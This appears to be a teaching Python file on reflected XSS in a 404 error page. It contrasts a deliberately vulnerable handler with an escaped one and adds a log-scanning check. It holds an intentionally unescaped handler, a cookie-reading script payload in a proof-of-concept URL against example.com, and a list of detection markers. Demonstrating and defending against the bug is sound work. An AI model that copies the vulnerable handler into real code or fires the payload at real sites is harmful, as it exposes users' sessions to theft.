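```python
"""Reflected XSS in an error page, the bug class behind the Tomcat 404 report
above: a handler that echoes request parameters into the 404 body unescaped,
beside a hardened version, plus a check for requests carrying markup in their
parameters. Added example in Python, not Tomcat's code; the URLs it handles
are the proof-of-concept URLs from the post (example.com, no real target)."""
import html
from urllib.parse import parse_qs, urlsplit


def _params(request_url: str) -> dict:
    """Decode the query string the way a servlet container would (%3C -> <)."""
    return {k: v[0] for k, v in parse_qs(urlsplit(request_url).query).items()}


def not_found_vulnerable(request_url: str) -> str:
    """Builds a 404 page that reflects every parameter verbatim, so a decoded
    <script> in a parameter becomes live markup in the victim's browser."""
    echoed = ", ".join(f"{k}={v}" for k, v in _params(request_url).items())
    return f"<h1>404 Not Found</h1><p>No page for: {echoed}</p>"


def not_found_hardened(request_url: str) -> str:
    """Same page, but every reflected value is HTML-escaped, so the browser
    renders '<script>' as text instead of executing it."""
    echoed = ", ".join(f"{html.escape(k)}={html.escape(v)}"
                       for k, v in _params(request_url).items())
    return f"<h1>404 Not Found</h1><p>No page for: {echoed}</p>"


def suspicious_params(request_url: str) -> list:
    """Detection side: names of parameters whose decoded value contains markup
    or a script URL, useful when scanning access logs for probes like the ones
    listed above."""
    markers = ("<", ">", "javascript:")
    return [k for k, v in _params(request_url).items()
            if any(m in v.lower() for m in markers)]


if __name__ == "__main__":
    probe = ("http://www.example.com/?offset=1&cid=1"
             "&limit=%3Cscript%3Ealert(document.cookie)%3C/script%3E")
    print(not_found_vulnerable(probe))
    print(not_found_hardened(probe))
    print("suspicious:", suspicious_params(probe))
```

Escaping happens at output time, in the handler that writes HTML, rather than by rejecting input: the hardened page still reports the offending parameter, but as inert text. The detection helper is deliberately crude (a literal angle bracket in a parameter value) because that is exactly what the probes listed in this post look like in a server log.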
